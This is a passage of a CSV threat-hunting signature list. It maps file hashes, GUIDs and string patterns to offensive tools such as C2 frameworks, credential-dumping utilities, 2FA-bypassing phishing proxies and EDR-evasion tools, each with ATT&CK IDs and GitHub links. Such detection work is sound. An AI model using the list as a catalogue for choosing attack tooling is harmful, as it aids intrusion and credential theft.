TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c0847034ecb624fde98700f4866d0a3fb799d3ff601ccd56df5bf31a9c065a53*",".{0,1000}c0847034ecb624fde98700f4866d0a3fb799d3ff601ccd56df5bf31a9c065a53.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" 
"*c086c1e601dbde7b31cbaea56b915f22b1ebc21d744a431984406e6062b4b865*",".{0,1000}c086c1e601dbde7b31cbaea56b915f22b1ebc21d744a431984406e6062b4b865.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*c0cd3083f7015a42a6ceeaed3a49d889e899a1fb751fa952300e6f12669c0e4d*",".{0,1000}c0cd3083f7015a42a6ceeaed3a49d889e899a1fb751fa952300e6f12669c0e4d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*c0e4815479886635396488093956d7926bcd803a4651c715398cf4446a05a55f*",".{0,1000}c0e4815479886635396488093956d7926bcd803a4651c715398cf4446a05a55f.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*C0E67E76-1C78-4152-9F79-FA27B4F7CCCA*",".{0,1000}C0E67E76\-1C78\-4152\-9F79\-FA27B4F7CCCA.{0,1000}","offensive_tool_keyword","SingleDose","SingleDose is a framework to build shellcode load/process injection techniques","T1055 - T1185","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Wra7h/SingleDose","1","0","N/A","10","2","151","27","2023-05-15T19:46:43Z","2021-08-28T05:04:50Z" 
"*C10599E3-5A79-484F-940B-E4B61F256466*",".{0,1000}C10599E3\-5A79\-484F\-940B\-E4B61F256466.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*c1090dbc-f2f7-4d90-a241-86e0c0217786*",".{0,1000}c1090dbc\-f2f7\-4d90\-a241\-86e0c0217786.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","0","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*c10ef39f9a2560b0f51982c8553c6fa1c3f4a6700f11796b3bea82f8b0f650b6*",".{0,1000}c10ef39f9a2560b0f51982c8553c6fa1c3f4a6700f11796b3bea82f8b0f650b6.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c113347933ec19ba179dace4e51ef27c76562a5f57e0321de391ae10c1874712*",".{0,1000}c113347933ec19ba179dace4e51ef27c76562a5f57e0321de391ae10c1874712.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c12b1320138b4fd7578d7b1b4741bba50f115c8dcf7c3eb3d30bf939de134ade*",".{0,1000}c12b1320138b4fd7578d7b1b4741bba50f115c8dcf7c3eb3d30bf939de134ade.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/anthemtotheego/SharpSploitConsole","1","0","N/A","10","2","178","38","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z" "*C13C80ED-ED7A-4F27-93B1-DE6FD30A7B43*",".{0,1000}C13C80ED\-ED7A\-4F27\-93B1\-DE6FD30A7B43.{0,1000}","offensive_tool_keyword","SCOMDecrypt","SCOMDecrypt is a tool to decrypt stored RunAs credentials from SCOM servers","T1552.001 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/nccgroup/SCOMDecrypt","1","0","N/A","10","2","113","21","2023-11-10T07:04:26Z","2017-02-21T16:15:11Z" "*c13e7029b5bcb568a5d6fd9a1042e6a2599ac8c5795db5348124a39663368094*",".{0,1000}c13e7029b5bcb568a5d6fd9a1042e6a2599ac8c5795db5348124a39663368094.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*c1474dc5ff323f1351d89fcc7c922c0a612cf5dc1cd0b7dc719e0688d45aedcf*",".{0,1000}c1474dc5ff323f1351d89fcc7c922c0a612cf5dc1cd0b7dc719e0688d45aedcf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c1671ad8229c335d3b2edc0c2209db3d09104b85c050971fc8afc7b6f85ce0d0*",".{0,1000}c1671ad8229c335d3b2edc0c2209db3d09104b85c050971fc8afc7b6f85ce0d0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c1b584291f8b0c17013e438cfac02f28ea3088ae3884f3c0e27bf06f988339bf*",".{0,1000}c1b584291f8b0c17013e438cfac02f28ea3088ae3884f3c0e27bf06f988339bf.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c1c94cf03ed6fa3b74e3decbe2cedaec81d94a3046f001821111cb3f7687fdb1*",".{0,1000}c1c94cf03ed6fa3b74e3decbe2cedaec81d94a3046f001821111cb3f7687fdb1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*c1fb599493390e17676176219c5cdd8f4b4bca43696b6a54ded88c9b28f741ff*",".{0,1000}c1fb599493390e17676176219c5cdd8f4b4bca43696b6a54ded88c9b28f741ff.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*C2 Client*",".{0,1000}C2\sClient.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*C2 Framework for villains*",".{0,1000}C2\sFramework\sfor\svillains.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*C2 Nimplant 
Server*",".{0,1000}C2\sNimplant\sServer.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*C2 Server*",".{0,1000}C2\sServer.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*c2 target,eg 127.0.0.1:64535*",".{0,1000}c2\starget,eg\s127\.0\.0\.1\:64535.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","0","N/A","10","10","472","59","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z" "*C2.KillDate*",".{0,1000}C2\.KillDate.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*c2.striker.*",".{0,1000}c2\.striker\..{0,1000}","offensive_tool_keyword","Striker","Striker is a simple Command and 
Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","290","44","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*C2.UserAgent*",".{0,1000}C2\.UserAgent.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*C2/C2Server.*",".{0,1000}C2\/C2Server\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*C2_RPC_functions.py*",".{0,1000}C2_RPC_functions\.py.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*c2_server*.py*",".{0,1000}c2_server.{0,1000}\.py.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*c2_server.py *",".{0,1000}c2_server\.py\s.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "*c2_server.resources*",".{0,1000}c2_server\.resources.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*C2_Server-main*",".{0,1000}C2_Server\-main.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","1","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*c2_service.sh*",".{0,1000}c2_service\.sh.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*c209bedad717b0db49a7109c3b4dec90cfad5d58dbfe7e8c32f828c61494bc60*",".{0,1000}c209bedad717b0db49a7109c3b4dec90cfad5d58dbfe7e8c32f828c61494bc60.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c25ff60d4286c239522b0b0292c801a5711ec994fa90429adf7d57ed8735bb07*",".{0,1000}c25ff60d4286c239522b0b0292c801a5711ec994fa90429adf7d57ed8735bb07.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c27eaa1709a00ec0c47d47b8c6c061b2f63223d8553fa7d7baa40f7cea903b8f*",".{0,1000}c27eaa1709a00ec0c47d47b8c6c061b2f63223d8553fa7d7baa40f7cea903b8f.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*c288394f0c71cea2f14223899de957ca2a5d101bcbfe1efacc23e480fabde335*",".{0,1000}c288394f0c71cea2f14223899de957ca2a5d101bcbfe1efacc23e480fabde335.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" 
"*C2ACD3667483E5AC1E423E482DBA462E96DA3978776BFED07D9B436FEE135AB2*",".{0,1000}C2ACD3667483E5AC1E423E482DBA462E96DA3978776BFED07D9B436FEE135AB2.{0,1000}","offensive_tool_keyword","StandIn","StandIn is a small .NET35/45 AD post-exploitation toolkit","T1087 - T1069 - T1558 - T1204 - T1136 - T1482","TA0007 - TA0003 - TA0006 - TA0004","N/A","N/A","Discovery","https://github.com/FuzzySecurity/StandIn","1","0","N/A","9","7","656","120","2023-12-02T21:20:09Z","2020-11-05T22:49:27Z" "*c2c3bd47f27bb46be73e9ac8aff49dc36d6baea77ac7998d3668aef1b4893f85*",".{0,1000}c2c3bd47f27bb46be73e9ac8aff49dc36d6baea77ac7998d3668aef1b4893f85.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*c2c9d4ca6ba2ca502be8d0a9670f7e8a5f7ab0bf315690b1c9df7b53ccf9c5cd*",".{0,1000}c2c9d4ca6ba2ca502be8d0a9670f7e8a5f7ab0bf315690b1c9df7b53ccf9c5cd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*C2concealer -*",".{0,1000}C2concealer\s\-.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*C2concealer-master*",".{0,1000}C2concealer\-master.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","1","N/A","10","10","913","166","2024-03-15T20:50:22Z","2020-03-23T14:13:16Z" "*C2DAC5B0DBA2FC51AAA3FAF6AA1372E43D7A2B33F288FCEC5ADD4B7360440DBA*",".{0,1000}C2DAC5B0DBA2FC51AAA3FAF6AA1372E43D7A2B33F288FCEC5ADD4B7360440DBA.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" 
"*c2db7182d606ef3d00a40360e62f16a47aea5d39872bb5bab4b115d4da864394*",".{0,1000}c2db7182d606ef3d00a40360e62f16a47aea5d39872bb5bab4b115d4da864394.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*'C2Default'*",".{0,1000}\'C2Default\'.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*c2endpoint.php*",".{0,1000}c2endpoint\.php.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1077","109","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" "*c2fc425c6790459d69b7511d6b7626d4f140442c65a7751d69541ceab1bc47bd*",".{0,1000}c2fc425c6790459d69b7511d6b7626d4f140442c65a7751d69541ceab1bc47bd.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*C2FunctionAgent*",".{0,1000}C2FunctionAgent.{0,1000}","offensive_tool_keyword","ServerlessRedirector","Serverless Redirector in various cloud vendor for red team","T1090.003 - T1095 - T1001.003","TA0010 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/KINGSABRI/ServerlessRedirector","1","1","#useragent","10","1","69","10","2022-12-08T08:56:02Z","2022-12-08T07:52:49Z" "*c2hlbGxjb2Rl*",".{0,1000}c2hlbGxjb2Rl.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*c2lint *",".{0,1000}c2lint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 
